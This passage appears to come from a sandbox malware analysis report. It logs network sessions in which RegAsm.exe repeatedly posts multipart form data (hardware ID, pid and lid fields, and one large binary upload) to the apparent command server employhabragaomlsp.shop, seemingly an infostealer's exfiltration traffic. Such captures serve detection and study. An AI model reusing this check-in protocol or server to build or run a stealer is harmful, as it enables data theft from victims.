name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:25 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s0ppgv9j6uj02gtk1cjaa007k3; expires=Mon, 16-Sep-2024 16:09:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lSvzJ26TeLsAMcfdGRG%2BoEUY4r%2F3%2FOWlgxihLQCfK9IzlwpQ3zyTKP3n4Uj4SfDZf7m6GHIGzaElpUIudVawsNmk4wWCsHoCQp9Nx1T0SCZXE123fpiSaTe%2BtpnqDR6tJYwmSwpJSELJDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871ca0fe143d5-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49750	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:24 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: employhabragaomlsp.shop
2024-05-23 22:22:24 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:25 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=roilkt33v61qs3qe7l233oc2ih; expires=Mon, 16-Sep-2024 16:09:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48q62VXBJ48esg2WOEYBT9wWyaNxH%2Br4H48nsTKoFBWatOqpByduE1lB4xruBx6TXD%2Fr5y6vT4I5l2oNlbCA4OlVs82uIHYZSmXitTkPowvjqaev55AgmQifjsqNo50RXq4ZnwbFPfoJfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871ca0b48429a-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49752	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:26 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: employhabragaomlsp.shop
2024-05-23 22:22:26 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:27 UTC	824	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pj49dve1vklkqmme50uegjhh0i; expires=Mon, 16-Sep-2024 16:09:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ttHEjxTqkufMMVmrC%2B8x0dvr5gGXgJUKjI01VgPA3F8dbRCmIr%2BC5%2FAg%2FSenB5sVTsvPViiht9W6%2FG3SoOgJxE%2Bn8jNMu%2BdWBVAG5unvQCmUfZQSZbNWJ5cLaBv%2BgGJExMB3bPoy28%2FDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871db08b142f4-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49753	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:27 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572276 Host: employhabragaomlsp.shop
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 77 b4 22 d5 56 b8 2f 56 83 cb 31 d7 50 ef 5c 7e 74 c7 77 fa 4f 49 97 d7 0a 1a 91 3e b0 a7 07 a2 7e db 38 1d ab 3c 98 9d 90 a0 b2 b7 9e b5 a8 17 76 3a f2 e1 ec a1 36 4d 08 3d ef f3 4e 05 2a 6f f2 8a 85 5c 50 a2 8b d4 12 04 95 cd e6 2a 15 00 be e2 66 93 f5 e2 a3 c3 93 ea 3c cc 2c 73 e9 97 2a fe 50 7a d9 de f0 ac e7 a2 a9 44 a6 20 82 ba e1 22 fc eb 65 98 23 58 ae be 79 6e f8 67 07 2b e3 15 7d 76 95 17 ec 26 01 aa 67 24 58 e6 5b cc c2 5a e0 b6 ac e7 53 57 d3 e3 6f ca c8 dc eb 4d 6b 67 ad 21 04 ab ae d7 0f be 5c b1 47 50 95 2d fe bf 87 31 7b b1 30 32 18 43 d6 66 4f 03 88 7b d5 6c 3e ec 0a 2c 11 6d 72 f3 2a 66 78 3a 8e 55 61 ae 2e 4b b5 9f 19 ca bb 85 cf 67 68 e7 4d 75 5b 80 7c 1c a6 17 09 f7 fe 76 ea 9b 85 a8 af c7 02 54 33 65 a3 f7 65 d8 96 61 24 db 42 49 fb Data Ascii: w"V/V1P\~twOI>~8<v:6M=No\Pf<,sPzD "e#Xyng+}v&g$X[ZSWoMkg!\GP-1{02CfO{l>,mrfx:Ua.KghMu[\|vT3eea$BI
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: ef 2d e3 e6 34 2d a4 67 7c 67 fc a7 9a 59 50 c4 53 c7 e6 07 80 7b ee 27 ab eb 27 af 81 3e 1a fe f3 98 b7 f2 98 68 7a 8c e6 8e eb af be 7a 5d f4 a3 5e 65 67 27 8c 95 ba cc 10 c5 f1 8c f4 e3 b5 93 c7 24 91 70 10 df d8 95 cb c7 fe 79 16 fa 36 3d d7 b9 c9 fe 22 ca 52 2a 04 dc a7 dc 5f 7e 2c 9d e5 f4 48 0f c7 27 a6 78 88 bb 5b 0c 2e a1 19 86 12 a0 64 b7 c9 9e c0 33 78 7c c2 85 a5 a1 7f e2 45 4f 15 45 ee 2f 48 f2 80 e1 4a dd 17 e5 2b 82 3f 06 fa 73 eb f5 87 7e 58 0b d2 8b 23 a5 85 85 67 2b 5d 43 4d 78 45 df a3 09 4f 9b e0 86 e2 b1 66 9c d2 b8 3d 08 fc a0 c1 97 f0 8e 10 11 f6 c2 50 49 81 61 d6 19 e5 45 d5 6d a9 60 e5 1c ff f3 69 17 71 6d a8 c7 fa c4 ec bd 7b 7b 5a 7e f3 48 af 61 1e be bd 76 dd dd e5 86 c5 d7 51 d2 f7 6a b7 17 96 86 0b f7 1d 0a 10 d5 c8 bc 09 70 Data Ascii: -4-g\|gYPS{''>hzz]^eg'$py6="R*_~,H'x[.d3x\|EOE/HJ+?s~X#g+]CMxEOf=PIaEm`iqm{{Z~HavQjp
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: d9 dc c9 b2 fe 20 17 cd ce c4 cf 13 c2 5c b7 2a fb 8b 8b 47 b6 5c 53 c4 53 c4 5f a9 cd 3e 29 66 96 2b ff bb 11 e9 c7 95 e7 e4 d0 18 d6 bf 3a 64 bf 19 74 8c b7 50 6f 79 a0 50 33 87 b1 f6 f5 bb 55 ec 21 3a 0f 35 17 7d ca c1 71 d5 29 fc d0 c6 80 fb 7d c5 7b 9a 8b 4e f2 c9 51 9f 34 5e b6 fc c4 de bc b5 e9 a4 d4 f3 a9 f7 8d 91 3a 3d b8 2f 03 90 eb e0 b5 52 d4 e4 d6 cb 8d 77 63 5a 68 96 c1 6c 27 67 e0 96 ce ba 80 44 5c de 8f 0c 6e 5d f4 27 45 e3 47 70 7d bb bf 83 28 a8 f9 19 dc 77 fa af 3a 0e 7f 86 25 bd 37 5b a4 50 e2 12 3b 7c ad 5d d3 5e 03 18 c1 26 87 85 e3 9e 84 1f 28 5b bc 45 bf c1 07 a0 39 89 03 d6 c4 54 ce 1e 65 d2 c9 b9 45 d5 4d 83 6a 06 f3 c2 88 4c cc 8b a4 d0 a8 51 21 8a d0 89 da 96 15 03 f9 07 8f 62 1a 83 6b 8a b3 fe d2 db 8f f9 8b ef 68 c7 9e 89 d0 Data Ascii: \*G\SS_>)f+:dtPoyP3U!:5}q)}{NQ4^:=/RwcZhl'gD\n]'EGp}(w:%7[P;\|]^&([E9TeEMjLQ!bkh
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 3b 7e 19 9c 15 2c 3c 79 9e 6e 25 74 4b 2a a7 46 3f 46 2b 26 b1 8a 7e e1 e4 34 f8 e1 0f bd 35 c5 2a 85 c4 22 fe 82 83 cb ff 35 fa 21 a0 f0 2e 7f 61 1e e6 02 06 6c a1 81 81 0f 34 6f 8e 90 65 4e 31 42 a4 5b 55 9f 41 52 3d 5e 2f 7d ab 0e 21 f3 a0 e1 08 8a 7e 74 ee 07 fd 6c 0a a3 21 bc 4f 14 3f f2 d6 d7 58 9f e3 ad d6 55 c1 c1 af e8 1a d8 be f8 dc 31 27 79 55 5c 10 21 f3 f8 a1 89 73 b0 07 be 51 62 28 39 57 08 e1 b2 26 4e 63 59 c0 36 43 7a e9 cc 50 76 31 e0 05 d2 8c 57 62 3c 22 e0 3d fe e8 8b ea ed 95 74 07 aa 89 8c c9 49 fe 72 f0 2c bb e0 32 1a e6 13 50 07 2f 73 6d 26 a0 53 7c d8 b5 27 3f aa 52 47 91 39 d8 bc 58 fc d3 0d 51 7b c6 b1 d4 14 71 bc bf 76 66 05 67 1f 36 b2 44 de 01 ca f4 01 25 5e a2 6f da 84 ee 93 6a 8c 81 21 9d d6 ed 99 f7 a3 89 ab bc ef 65 ad 4d Data Ascii: ;~,<yn%tKF?F+&~45"5!.al4oeN1B[UAR=^/}!~tl!O?XU1'yU\!sQb(9W&NcY6CzPv1Wb<"=tIr,2P/sm&S\|'?RG9XQ{qvfg6D%^oj!eM
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 78 d5 a0 b5 7f c0 f6 1c bd d4 66 3c 73 63 52 f2 82 b8 be ef 8a ab d7 41 aa d7 ac 92 5c 44 a0 d0 61 52 b3 63 18 79 24 bb d0 66 64 5e 71 bf 68 75 95 e5 d7 4e 63 ff 8b da 93 46 8b ee 5e 3d 0d 46 af 30 d1 a0 b9 88 33 f9 eb 60 9d eb 4d 49 96 88 70 e5 99 24 77 b5 18 d2 8d 51 41 4a 0d 7c 86 f5 20 e2 a6 d8 06 96 dd fa 8b 9e 8c 1d 8f 48 2f 00 63 06 9b fa 72 cd 7a bc ef e5 96 71 81 a7 49 3d 51 21 96 e7 6e 39 ee ba 51 c0 b2 75 cb 30 af 32 de a5 74 8e 26 b9 10 43 4d 65 2e 9f 8c b3 b2 52 ca 50 ee 8b cd 10 13 8b 97 f9 b2 fa b3 3e 87 c9 cb ff 83 74 9e 76 73 16 73 5f 76 52 6f 73 df 39 d6 56 86 d0 27 39 ad 25 f0 24 ae cd 00 3e cb 76 53 65 94 4a 3e 53 48 52 17 e0 ab 09 fb c5 6a f8 47 a4 ca c4 09 57 95 df 4d f0 16 38 e4 cd e9 34 75 4a 94 7a b6 2a 85 a2 ff cb 9c 6b 0d 2c e6 Data Ascii: xf<scRA\DaRcy$fd^qhuNcF^=F03`MIp$wQAJ\| H/crzqI=Q!n9Qu02t&CMe.RP>tvss_vRos9V'9%$>vSeJ>SHRjGWM84uJz*k,
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 12 39 63 f0 ea 7f 78 c9 d4 9c 62 b4 88 c0 0f 73 7f 94 a6 76 9b 0c fc d5 43 c0 ef 53 6a 20 10 5b fa e5 99 77 67 de 75 35 f5 32 fb d4 99 c1 cc 6b d4 3b 42 15 c0 df 0f dd 7d 9a 6a fe 95 08 7e 97 fb 2e 3d 7a 4c 9d 7d 2b a7 bd 7f 17 11 34 1b 82 b5 7b 32 f0 24 ce 1e 4f 9a f3 d9 d0 92 83 2d 16 37 cd d3 6d 3d b8 3a 7b b3 af 51 23 2b 48 8d ad 67 22 3e 4e 5e de d0 3a 47 8f 86 65 b1 38 b6 c5 86 16 89 7a 82 d5 72 9d d3 d2 9e 79 95 9c b2 21 75 1d 3a 98 10 e5 ee fb 74 db 9c 47 32 31 aa 6a 9b 83 81 9b cf 70 b5 46 b2 5f 93 47 72 e5 19 49 d8 d3 49 7b a4 4c 76 d7 e9 27 48 68 87 e6 07 01 26 6c e4 51 3c 23 00 75 45 06 9f 41 15 20 5c 72 a2 cf 4c 93 c3 df e8 da 39 c1 f3 ba 08 3f 17 b0 83 5e 4a c2 7e b9 12 26 48 39 34 a4 a0 9c 56 ca f5 3b 7c 4f ea c4 b8 87 07 28 fd 47 e4 df 8c Data Ascii: 9cxbsvCSj [wgu52k;B}j~.=zL}+4{2$O-7m=:{Q#+Hg">N^:Ge8zry!u:tG21jpF_GrII{Lv'Hh&lQ<#uEA \rL9?^J~&H94V;\|O(G
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: 3b f9 0e 39 dc c4 55 87 f6 10 5c 14 22 33 fb 2f 03 9b 4a a7 73 7a f9 cc 77 1b ee 41 f8 7d 2e e3 30 7a 16 1a d5 ff 52 ae 0f 04 e3 71 40 1e 78 80 7d 4d 9b 2f d4 9e 24 59 15 9a f2 da 94 ec db 00 90 83 fb df 07 9c 07 39 bc 73 c6 4e 82 64 df 87 a9 68 ed b1 c0 3e bf 1b 1e c3 25 50 85 5e 7e bd 1a 44 2e 9d fb b5 de 97 17 9b 94 6c 8b 0b 40 f7 b7 b9 ac 8f e1 b2 e2 36 da 44 d7 33 79 f3 0b 75 17 75 ef 4a 30 65 80 c3 8a e1 3f 01 9c 28 86 b7 59 33 92 71 e6 c4 d8 13 9e e1 92 45 cb 01 1d b8 2a cb 66 79 d1 57 1f f3 9c f3 80 dd 1d d9 5b 7c 3b 21 82 d2 30 c4 fa 77 0e b7 da 70 c9 75 16 02 0d 2c 98 19 8e 74 ca bc 7d 37 da 4d 7c be 68 77 79 5b 5b 4a f9 5e ee fa c6 1c af 5b ad 8a 13 42 b1 fd 5e a4 cf 90 71 8c 62 dd cb d6 80 40 d4 32 ab c7 4b 38 4d 2c 74 e2 f1 ef bf 7e 25 6a cd Data Ascii: ;9U\"3/JszwA}.0zRq@x}M/$Y9sNdh>%P^~D.l@6D3yuuJ0e?(Y3qE*fyW[\|;!0wpu,t}7M\|hwy[[J^[B^qb@2K8M,t~%j
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: b7 47 71 f5 22 13 91 09 01 ca 8b f2 9b c3 f5 dc 44 1d 06 b1 82 cd 94 44 31 5b 56 ab 7b 2b 79 e3 22 ef 16 dc e2 e3 cc e1 c4 d9 01 ec 2c a4 8a 90 51 3d 72 33 74 1f 59 85 e4 d6 6e eb 29 56 f8 f8 ef bf e9 75 e8 fc af 2e 47 a8 d2 d8 fd b3 af e6 b5 d0 e0 fd b4 39 1f 20 67 1b 70 4f 53 50 88 b5 67 bf c1 95 6d 19 3e f4 40 f4 79 5b cf 39 b6 8e 94 b7 1e 48 b8 4f 4b f3 e3 8a 06 80 cd 3d 0c e6 5a 7d 24 91 41 64 98 68 ae 33 24 7c 49 0a a2 97 02 bb 0c 51 21 15 c6 08 62 3c 2c 84 28 c9 f2 5d b9 e5 7a 84 16 36 5b 14 52 a3 d9 ba a6 86 7d 57 02 ba 57 bd b2 a2 1d 90 e0 69 40 da 1b b7 1a 9b 4e 7f 65 0f 81 4f 7b 4c 5d b7 49 92 b2 eb 4c d0 b1 3f 57 f2 34 eb 94 05 6e f4 a6 b6 db 38 47 af 36 af c3 9e 22 8d d3 0c 79 70 d2 73 75 fb f8 c8 fb 18 d2 14 37 29 c2 fc 3e c6 89 5a 2a e1 e0 Data Ascii: Gq"DD1[V{+y",Q=r3tYn)Vu.G9 gpOSPgm>@y[9HOK=Z}$Adh3$\|IQ!b<,(]z6[R}WWi@NeO{L]IL?W4n8G6"ypsu7)>Z*
2024-05-23 22:22:27 UTC	15331	OUT	Data Raw: bc 5f 98 2a 7c dd ab 39 86 77 83 c0 3d 6d 23 3d 8d 04 df 9c 4f b3 d2 f8 ca 8b da f8 bd 4a c6 9f 3b aa d1 32 50 d2 67 27 0f d8 fc 8e 9c 7c 24 26 32 78 f3 af 79 fe f0 9e 87 f5 09 11 eb 42 56 48 b7 fa 56 c7 d9 6c 98 2d c9 12 46 01 f9 5f a3 f9 37 ac 9d 59 06 47 af b0 44 c0 d3 1d ce bf 92 2f 1e c9 71 16 66 64 da d2 cd 8c 37 f1 6c 71 94 55 95 2b bf ae 53 aa 85 f4 f2 96 b6 91 3d 45 b5 27 14 1f 0a 36 9e 20 3d d4 26 95 6b 54 21 c8 5b f1 b5 fb a3 a7 ba 36 23 74 75 c1 27 d1 63 8f ff fb 98 2c 19 4b e4 29 2b 26 6a 8a 37 28 d2 1b ca 56 8a 96 bf 63 65 e6 3c 2b aa 2f fc f0 0e af 9f c9 5c 60 6f 70 ed 63 3e 19 8c 86 cd b5 94 87 13 bd fe 66 6e 8c 96 b0 83 03 47 7d e7 28 03 16 7f d6 36 b9 4e f9 16 bb 4c 3a 28 ac 6c 2c 3e 41 8c b9 46 c0 c5 1c 4a 78 3d 6e 7e fc 7d 62 01 e7 17 Data Ascii: _*\|9w=m#=OJ;2Pg'\|$&2xyBVHVl-F_7YGD/qfd7lqU+S=E'6 =&kT![6#tu'c,K)+&j7(Vce<+/\`opc>fnG}(6NL:(l,>AFJx=n~}b
2024-05-23 22:22:30 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=20ek19g1ttd6knc53vetsd8b45; expires=Mon, 16-Sep-2024 16:09:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Xl0v3Nt6WUkk5Xsf2Dqmm7olYJZdVyuRs%2BmKDZARc%2B7f93kyRaGTYB7PMzfy2esznsY0wzrK3ODaX6OsN9V9Yuuxq6pFMeJF35cZsxQS2XfW%2Bojae3c6yiDCsT3%2FyJbFYvQ2eh8bFTDuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871df7ce4c452-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49754	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:28 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: employhabragaomlsp.shop
2024-05-23 22:22:28 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:28 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-05-23 22:22:28 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=10mhqcauvc49q90fforvstb3od; expires=Mon, 16-Sep-2024 16:09:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0yvPmf4LuFQsJl1GOcESigL82CPu0wGIDbERYyU1eIwcOR%2BGrYmjfmgoZsgkfI6kiXu3R75od71owiVesCjbIqM1AwzZwDnECBagGyr2GUlp%2BwybSB9g7ogxmpPlQTHBJTdIkwHhf0JGmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871e17b5fc328-EWR alt-svc: h3=":443"; ma=86400
